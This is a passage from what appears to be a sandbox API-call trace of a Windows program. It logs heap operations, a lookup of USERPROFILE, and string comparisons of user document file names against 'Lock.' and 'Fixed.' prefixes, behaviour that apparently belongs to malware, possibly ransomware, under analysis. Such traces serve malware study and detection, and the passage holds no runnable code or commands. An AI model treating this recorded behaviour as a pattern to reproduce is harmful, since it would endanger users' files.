lpFilePart=0x8cf650*="iN034yd-ltTggQ-HcC.xlsx") returned 0x31 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.900] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\iN034yd-ltTggQ-HcC.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\in034yd-lttggq-hcc.xlsx")) returned 0xffffffff [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854308 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.900] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.900] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.900] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0215.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0215.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0215.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0215.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0215.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0215.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0215.901] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lmvGT20EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mvGT20EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vGT20EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GT20EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T20EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="20EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EAt7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="At7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="97ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.901] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0215.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0215.902] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0215.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.902] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0215.902] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2a736f0 [0215.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lmvGT20EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mvGT20EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vGT20EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GT20EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T20EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="20EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EAt7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="At7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="97ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.903] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.pptx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a733e0 [0215.903] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a733e0 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.903] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a732c8 | out: hHeap=0x2af0000) returned 1 [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.904] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.904] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72318 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.904] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0215.904] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.904] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab008 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.905] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854470 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0215.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72328 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.906] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab050 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.906] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0215.907] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854290 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.907] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.907] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0215.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72258 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721e8 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0215.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf48 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.908] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.908] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.908] 